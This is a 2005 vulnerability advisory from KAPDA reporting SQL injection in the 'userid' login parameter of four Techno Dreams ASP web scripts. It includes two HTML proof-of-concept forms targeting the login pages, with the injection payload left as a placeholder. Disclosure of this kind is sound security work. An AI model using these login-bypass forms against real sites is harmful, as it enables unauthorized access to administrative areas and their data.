[KAPDA::#9]Techno Dreams Scripts Vulnerabilities
KAPDA New advisory
Vulnerable products :
Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script
Vendor: http://www.t-dreams.com/
Risk: High
Vulnerability: Sql injection
Date :
--------------------
2005/10/22
About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script
If you have a site and want to make a section for Announcements or
Recent News, then you might need this script.
Techno Dreams Guestbook Script
It uses MS Access with ability to be upgraded into SQL. Now, we've
added an Admin Area for the script.
Techno Dreams Mailing List Script :
Let your visitors join your mailing list... and send mass emails to all
of this list. Very good but simple ASP script (MS Access but SQL
upgradeable).
Techno Dreams WebDirectory :
Simple yet effect search engine (if we could say about it; since it's
look like a web directory). With some advance features like approval,
hits, categories, advance search, admin area, what's new, new updated,
and what's hot...
Vendor`s description : http://www.t-dreams.com/downloads.asp
Discussion :
----------------
Several scripts do not properly validate user-supplied input. A remote
user can create specially crafted parameter values that will execute
SQL commands on the underlying database.
Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook -
WebDirectory)
Sql injection in /login.asp ( Mailing List)
at parameter named 'userid'. Attacker can enter SQL command to
login as low-level user.(For all products)
Proof of Concepts:
--------------------
<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
Solution:
--------------------
No patch`s released yet by vendor.
More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit Above Link for more details.
Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)